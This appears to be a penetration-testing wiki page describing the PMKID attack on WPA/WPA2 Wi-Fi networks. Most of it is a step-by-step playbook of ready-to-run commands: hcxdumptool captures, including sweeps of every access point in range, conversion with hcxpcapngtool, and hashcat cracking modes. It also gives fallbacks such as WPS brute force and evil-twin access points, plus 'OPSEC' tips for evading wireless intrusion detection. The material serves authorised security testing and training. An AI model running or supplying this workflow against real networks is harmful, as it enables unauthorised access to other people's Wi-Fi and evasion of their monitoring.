PMKID Attack
#Overview
The PMKID (Pairwise Master Key Identifier) attack, discovered by Jens "atom" Steube in 2018, allows offline WPA/WPA2-PSK cracking without capturing a 4-way handshake and without any connected clients. The PMKID is sent by the AP in the first frame of the 4-way handshake (EAPOL frame 1/4) and can be requested by simply associating with the AP. This eliminates the need for deauthentication frames, making the attack significantly stealthier.
Key advantage: No connected clients needed. No deauthentication needed. No active disruption of the network.
#How PMKID Works
The PMKID is derived as:
PMKID = HMAC-SHA1(PMK, "PMK Name" || AP_MAC || Client_MAC)
TEXT
Where PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096).
Since the PMKID contains a hash of the passphrase (through the PMK), it can be used for offline dictionary attacks — just like a 4-way handshake, but without requiring any client traffic.
#PMKID vs 4-Way Handshake
| Aspect | 4-Way Handshake | PMKID Attack |
|---|---|---|
| Client required | Yes (or deauth to force reconnection) | No |
| Deauth needed | Usually yes | No |
| Stealth | Low (deauth frames logged) | High (no disruption) |
| Capture time | Variable (wait for client) | Seconds (associate + receive) |
| AP support | All WPA/WPA2 | Most modern APs (~60%+) |
| Hashcat mode | 22000 | 22000 (same format) |
#Attack Workflow
#Step 1: Adapter Setup
# Kill interfering processes
sudo airmon-ng check kill
# Start monitor mode
sudo airmon-ng start wlan0
# Verify adapter is in monitor mode
iw dev wlan0mon info
BASH
#Step 2: PMKID Capture with hcxdumptool
# Basic PMKID capture (target all APs)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active_bids=1
# Targeted capture (specific BSSID)
sudo hcxdumptool -i wlan0mon -o capture.pcapng \
--active_bids=1 \
--rds=1 \
--rcv_client=1 \
--rcv_ap=1 \
--filterlist_ap=ap_filter.txt \
--filterlist_client=client_filter.txt
# Long-duration capture (for difficult targets)
sudo hcxdumptool -i wlan0mon -o capture.pcapng \
--active_bids=1 \
--stay_time=30
# The --active_bids=1 flag sends association requests to trigger PMKID
# The --rds=1 flag enables request-to-send frames for interaction
# --rcv_client and --rcv_ap enable client and AP interaction
BASH
#Step 3: Convert Capture to Hashcat Format
# Convert .pcapng to hashcat 22000 format
hcxpcapngtool -o hash.hc22000 capture.pcapng
# The tool will report:
# EAPOL messages: N
# PMKID: M
# If PMKID count is 0, the AP doesn't send PMKID (see Troubleshooting)
# View summary of captured hashes
hcxpcapngtool -o hash.hc22000 capture.pcapng --info=all
BASH
#Step 4: Dictionary Attack with Hashcat
# Basic dictionary attack
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt
# Rule-based mutation
hashcat -m 22000 hash.hc22000 wordlist.txt \
-r /usr/share/hashcat/rules/best64.rule
# Combinator attack
hashcat -m 22000 hash.hc22000 -a 1 wordlist1.txt wordlist2.txt
# Mask attack (pattern-based)
hashcat -m 22000 hash.hc22000 -a 3 '?u?l?l?l?d?d?d?d?s'
# Session management (long-running)
hashcat -m 22000 hash.hc22000 rockyou.txt --session pmkid-crack
hashcat --session pmkid-crack --restore # Resume
# Show cracked results
hashcat -m 22000 hash.hc22000 --show
BASH
#Advanced Techniques
#Targeting Multiple APs
hcxdumptool captures PMKIDs from all nearby APs in a single session. This is a major advantage over handshake capture, which targets one AP at a time.
# Capture PMKIDs from all APs in range (5-minute sweep)
sudo hcxdumptool -i wlan0mon -o sweep.pcapng --active_bids=1 -t 300
# Convert and extract all hashes
hcxpcapngtool -o sweep.hc22000 sweep.pcapng
# Crack all hashes simultaneously
hashcat -m 22000 sweep.hc22000 rockyou.txt
BASH
#PMKID + Handshake Combined
hcxdumptool can capture both PMKIDs and handshakes in the same session, maximizing the chance of cracking.
# Combined PMKID + handshake + EAP capture
sudo hcxdumptool -i wlan0mon -o combined.pcapng \
--active_bids=1 \
--rds=1 \
--rcv_client=1 \
--rcv_ap=1
# Convert (will extract both PMKIDs and handshakes)
hcxpcapngtool -o combined.hc22000 combined.pcapng
# Crack either type
hashcat -m 22000 combined.hc22000 rockyou.txt
BASH
#Pre-Computed PMK Attack
If the SSID is known, pre-compute PMKs for common passwords and compare against the PMKID directly (faster than brute-force for common SSIDs).
# Generate PMK list for a known SSID
hashcat -m 22000 hash.hc22000 --session=pmk-gen wordlist.txt
# Or use hcxeiutool for PMK-based attacks
hcxpcapngtool -o hash.hc22000 capture.pcapng
# Hashcat will automatically handle PMKID-to-PMK comparison
BASH
#Troubleshooting
| Problem | Cause | Solution |
|---|---|---|
| "0 PMKIDs extracted" | AP doesn't send PMKID in association response | Try handshake capture instead |
| PMKID captured but won't crack | Weak wordlist | Use larger wordlist + rules |
| hcxdumptool fails to associate | AP uses 802.11w (MFP) mandatory | Some MFP APs reject unauthenticated association |
| Adapter not supported | Adapter doesn't support required ioctls | Use a modern adapter (Alfa AWUS036ACH, etc.) |
| " hcxdumptool: interface does not support required ioctl" | Driver issue | Install updated wireless drivers, or try different adapter |
| Capture shows "EAPOL" but no "PMKID" | AP sends PMKID only in certain frames | Increase capture duration, or use --stay_time=60 |
#APs That Don't Send PMKID
Not all APs send PMKID. Approximately 40% of APs don't include it in their EAPOL frame 1/4. For these:
- Fall back to handshake capture — use airodump-ng + deauth
- Try hcxdumptool with longer duration — some APs send PMKID intermittently
- Check for WPS — if WPS is enabled, use reaver/bully as an alternative
- Use an evil twin — force clients to authenticate to your AP
#OPSEC Considerations
- PMKID attacks are significantly stealthier than handshake capture because:
- No deauthentication frames are transmitted
- No legitimate client traffic is disrupted
- Only a single association request is sent per AP
- However, the association request is still visible to WIDS/WIPS
- hcxdumptool's
--active_bids=1flag sends association requests, which creates a brief client entry in the AP's station table - For maximum stealth, use passive-only capture with hcxdumptool (omit
--active_bids=1), but this requires waiting for legitimate client handshakes
#Cross-References
- WPA/WPA2 Cracking — Traditional handshake capture (fallback when PMKID isn't available)
- WPA3 Attacks — WPA3-SAE attacks (PMKID is not exposed in SAE-only mode)
- Deauthentication Attacks — Required for handshake capture (not needed for PMKID)
- Evil Twin & Rogue AP — Alternative when PMKID and handshake both fail
#Tool References
| Tool | Purpose | Link |
|---|---|---|
| hcxdumptool | PMKID and handshake capture | https://github.com/ZerBea/hcxtools |
| hcxpcapngtool | Convert captures to hashcat format | https://github.com/ZerBea/hcxtools |
| hashcat | Offline hash cracking | https://hashcat.net/hashcat/ |
| bettercap | WiFi reconnaissance and PMKID | https://www.bettercap.org/ |
#Source Machines
- No specific HTB machines; PMKID attacks require physical wireless assessment